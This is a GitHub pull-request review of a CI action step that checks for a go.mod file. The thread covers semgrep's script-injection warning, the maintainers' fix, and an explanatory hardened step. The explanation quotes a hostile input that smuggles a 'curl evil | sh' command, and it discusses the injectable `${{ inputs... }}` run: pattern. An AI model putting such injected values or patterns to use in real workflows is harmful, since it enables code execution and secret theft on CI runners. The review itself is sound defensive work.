Merged
Changes from 3 commits
16 changes: 15 additions & 1 deletion .github/templates/run-script-and-commit/action.yaml
Expand Up @@ -39,13 +39,27 @@ runs:
uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8
Collaborator: what repository is checked out here when this is called from a different repo?

Member Author: the callee repo, for example the cluster module repo

with:
fetch-depth: 0
fetch-tags: true
token: ${{ inputs.apix_bot_pat }}
ref: ${{ inputs.branch }}

- name: Check if Go project
id: check-go
shell: bash
run: |
GO_MOD_PATH="${{ inputs.repo-path }}go.mod"
echo "go_mod_path=$GO_MOD_PATH" >> $GITHUB_OUTPUT
if [ -f "$GO_MOD_PATH" ]; then
echo "is_go_project=true" >> $GITHUB_OUTPUT
else
echo "is_go_project=false" >> $GITHUB_OUTPUT
fi

semgrep-code-mongodb bot (Jan 9, 2026): Using variable interpolation ${{...}} with github context data in a run: step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. github context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with env: to store the data and use the environment variable in the run: script. Be sure to double-quote the environment variable, like this: "$ENVVAR".

🚀 Fixed in commit 778f89c 🚀

Member Author: /fp no security issue as this code is equivalent to the previous code and we control what paths we pass

Collaborator: it may help to pass this as an env var or at least validate via regex that repo-path can only be a path-like string

Member Author: @maastha cc @manupedrozo @EspenAlbert at the end I've changed repo-path to go-mod-path as it's only used for that, changed here: 778f89c

and adapted CFN repo which is the only one using it: mongodb/mongodbatlas-cloudformation-resources#1526
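The thread above discusses two mitigations for the `${{ inputs.repo-path }}` interpolation that semgrep flagged in the "Check if Go project" step: passing the input through `env:` instead of splicing it into the script text, and validating that it is path-like. The step below is an added example of both applied together; it is not the project's action.yaml (which, per the author, later renamed the input to go-mod-path). Step names and outputs mirror the hunk; the regex, the `..` check, `set -euo pipefail` and the `::error::` annotation are assumptions about what a caller should be allowed to pass.

```yaml
# Added example, not the project's own step. Same behaviour as the hunk's
# "Check if Go project" step, but the input is handed to bash as data.
    - name: Check if Go project
      id: check-go
      shell: bash
      env:
        # ${{ }} is still expanded by the runner, but into an environment
        # variable; the script text itself no longer contains caller input.
        REPO_PATH: ${{ inputs.repo-path }}
      run: |
        set -euo pipefail
        # Assumed contract: empty (repo root) or a relative directory path that
        # ends in "/" and contains only plain path characters. No "..", no
        # quotes, no "$(...)", no newlines. Anything else fails the step.
        path_re='^([A-Za-z0-9._-]+/)+$'
        if [[ -n "$REPO_PATH" ]]; then
          if [[ ! "$REPO_PATH" =~ $path_re || "$REPO_PATH" == *..* ]]; then
            echo "::error::repo-path must be a relative directory path ending in '/', got '$REPO_PATH'"
            exit 1
          fi
        fi
        GO_MOD_PATH="${REPO_PATH}go.mod"
        # Quote $GITHUB_OUTPUT as well; it is a runner-provided file path.
        echo "go_mod_path=$GO_MOD_PATH" >> "$GITHUB_OUTPUT"
        if [[ -f "$GO_MOD_PATH" ]]; then
          echo "is_go_project=true" >> "$GITHUB_OUTPUT"
        else
          echo "is_go_project=false" >> "$GITHUB_OUTPUT"
        fi
```

With the value in `REPO_PATH`, a hostile input such as `"; curl evil | sh; #` is just a string that fails the regex, whereas inside `run:` the same value would have been parsed by bash before the script's first line executed. The regex also enforces the trailing-slash contract the concatenation depends on, so a caller passing `cfn` instead of `cfn/` gets a visible failure rather than a silent `is_go_project=false`.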

- name: Set up Go
if: steps.check-go.outputs.is_go_project == 'true'
uses: actions/setup-go@4dc6199c7b1a012772edbd06daecab0f50c9053c
with:
go-version-file: ${{ format('{0}go.mod', inputs.repo-path) }}
go-version-file: ${{ steps.check-go.outputs.go_mod_path }}
Collaborator:
Suggested change
go-version-file: ${{ steps.check-go.outputs.go_mod_path }}
go-version-file: ${{ steps.check-go.outputs.go_mod_path }}

- name: Run specified script
shell: bash
run: ${{ inputs.script_call }}
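Review bot: `GO_MOD_PATH="${{ inputs.repo-path }}go.mod"` in the new Check if Go project step splices an action input directly into the bash script text, which is the pattern semgrep flagged; move the input to `env:` (`REPO_PATH: ${{ inputs.repo-path }}`) and build the path from `"$REPO_PATH"` inside the script so the value is parsed as data, not as shell code. Two smaller points on the same step: the concatenation only works when `repo-path` ends in "/" (the removed `format('{0}go.mod', inputs.repo-path)` had the same contract), so a caller passing `cfn` gets `cfngo.mod`, `is_go_project=false` and a silently skipped Go setup, which a shape check or `${REPO_PATH%/}/go.mod` would avoid; and `>> $GITHUB_OUTPUT` should be `>> "$GITHUB_OUTPUT"`. `run: ${{ inputs.script_call }}` is the same interpolation by design, since running a caller-supplied script is the point of this action, but that script runs after a checkout made with `apix_bot_pat`, so callers of this template must pass only literal, repo-controlled values and never anything derived from a pull request or issue.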